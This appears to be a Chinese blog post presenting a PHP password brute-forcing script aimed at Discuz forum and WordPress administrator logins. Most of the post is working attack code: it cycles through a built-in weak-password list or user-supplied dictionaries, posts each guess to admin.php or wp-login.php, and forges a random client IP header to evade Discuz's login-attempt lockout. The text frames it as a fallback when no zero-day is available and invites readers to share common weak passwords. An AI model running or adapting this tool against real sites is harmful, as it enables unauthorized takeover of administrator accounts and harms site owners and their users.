爸爸再也不用担心传统信息安全攻击手段突破不了了。

当你觉得传统信息安全手段都用完了的时候,你是否想过还有暴力破解啊。现在一般的大型网站都是dz论坛跟wp博客,没有0DAY在手怎么办啊,你忘了一句话叫做不怕神一样的对手只怕猪一样的队友啊,结合非传统的社工工程学收集信息,制作字典,最后进行fuzz。没事写了个PHP版的fuzz,只写了dz跟wp的模块,有兴趣的朋友自己添加其他模块。有好的常用弱口令的同学麻烦在此帖共享下。另外没有写自动抓取dz管理员列表跟wp管理员列表的脚本,大家还是google一下你就知道吧,然后放在user.txt里面进行fuzz。下次一定补上这个功能。
以下是效果图:
fuzz

<?php 
if ($argc < 3) { 
    print_r(' 
============================================================ 
author : Chora 
example: ' . $argv[0] . ' Host dz (utf8) 
example: ' . $argv[0] . ' Host dz gbk 
example: ' . $argv[0] . ' Host wp gbk 
example: ' . $argv[0] . ' Host Type Gbk/Utf8 
============================================================ 
'); 
    die(); 
} 
define("DZ", "/admin.php"); //定义Discuz登陆地址 
define("WP", "/wp-login.php");//定义WordPress登陆地址 
$host = $argv[1]; 
$type = strtoupper($argv[2]); 
$code = strtoupper($argv[3]); 
function send($url, $post, $cookie, $header, $ip) 
{ 
    global $host; 
    $data = ($post ? "POST " : "GET ") . $url . " HTTP/1.1\r\n"; 
    $data .= "Host: $host\r\n"; 
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\r\n"; 
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n"; 
    $data .= "Accept-Encoding: gzip, deflate\r\n"; 
    $data .= $cookie ? $cookie . "\r\n" : ""; 
    $data .= $ip ? "Client_Ip: $ip\r\n" : ""; 
    $data .= $post ? "Content-Type: application/x-www-form-urlencoded\r\n" : ""; 
    $data .= $post ? "Content-Length: " . strlen($post) . "\r\n" : ""; 
    $data .= "Connection: close\r\n\r\n"; 
    $data .= $post ? "$post\r\n\r\n" : ""; 
    $fp = fsockopen(gethostbyname($host), 80, $errno, $errstr); 
    if ($fp) { 
        fputs($fp, $data); 
        while (!feof($fp)) { 
            $html .= fread($fp, 8192); 
        } 
        fclose($fp); 
        return $html; 
    } else { 
        die("Could not Connect to $host $errno:$errstr"); 
    } 
} 
function match($result) 
{ 
    return preg_match('/302 Found/i', $result); //自定义关键词 
} 
function ip() //绕过Discuz的限制登陆次数 
{ 
    $ip[1] = rand(0, 255); 
    $ip[2] = rand(0, 255); 
    $ip[3] = rand(0, 255); 
    $ip[4] = rand(0, 255); 
    $ip    = implode('.', $ip); 
    return $ip; 
} 
function encode($arr, $code) 
{ 
    foreach ($arr as $value) { 
        if ($code == 'GBK') { 
            $value = gbk($value); 
        } 
        $value    = trim($value); 
        $encode[] = rawurlencode($value); 
    } 
    return $encode; 
} 
function gbk($string)//转化为GBK编码,默认为UTF8,主要针对于Discuz含有中文的管理员 
{ 
    return iconv("UTF-8", "GBK", $string); 
} 
function cut($dic) 
{ 
    $dic = explode("\r\n", $dic); 
    array_shift($dic); 
    array_pop($dic); 
    return $dic; 

} 
//内置用户名 
$user = " 
admin 
管理员 
"; 
//内置密码 
$pass = " 
admin 
123456 
admin888 
1234567 
12345678 
123456789 
987654321 
87654321 
7654321 
654321 
555555 
111111 
666666 
888888 
88888888 
000000 
00000000 
5201314 
5211314 
asdfgh 
"; 
//可外接用户自定义用户名跟密码:user.txt(用户名),pass.txt(密码) 
if (!file_exists('user.txt')) { 
    if (file_exists('pass.txt')) { 
        $user = cut($user); 
        $pass = file('pass.txt'); 
    } else { 
        $user = cut($user); 
        $pass = cut($pass); 
    } 

} elseif (file_exists('user.txt')) { 
    if (file_exists('pass.txt')) { 
        $user = file('user.txt'); 
        $pass = file('pass.txt'); 
    } else { 
        $user = file('user.txt'); 
        $pass = cut($pass); 
    } 
} 
$user = encode($user, $code); 
$pass = encode($pass, $code); 
function crackdz() 
{ 
    global $user, $pass; 
    foreach ($user as $username) { 
        foreach ($pass as $password) { 
            $post   = "admin_username=$username&admin_password=$password"; 
            $result = send(DZ, $post, '', '', ip()); 
            if (match($result)) { 
                echo "Found[*] Username: " . rawurldecode($username) . " Password: $password\r\n"; 
                $found = 1; 
            } 
        } 
    } 
    if (!$found) { 
        echo 'Not Found!'; 
    } 
    exit(); 
} 
function crackwp() 
{ 
    global $user, $pass; 
    foreach ($user as $username) { 
        foreach ($pass as $password) { 
            $post   = "log=$username&pwd=$password"; 
            $result = send(WP, $post, '', '', ''); 
            if (match($result)) { 
                echo "Found[*] Username: $username Password: $password\r\n"; 
                $found = 1; 
            } 
        } 
    } 
    if (!$found) { 
        echo 'Not Found!'; 
    } 
    exit(); 
} 
if ($type == 'DZ') { 
    crackdz(); 
} elseif ($type == 'WP') { 
    crackwp(); 
} 
?>
标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码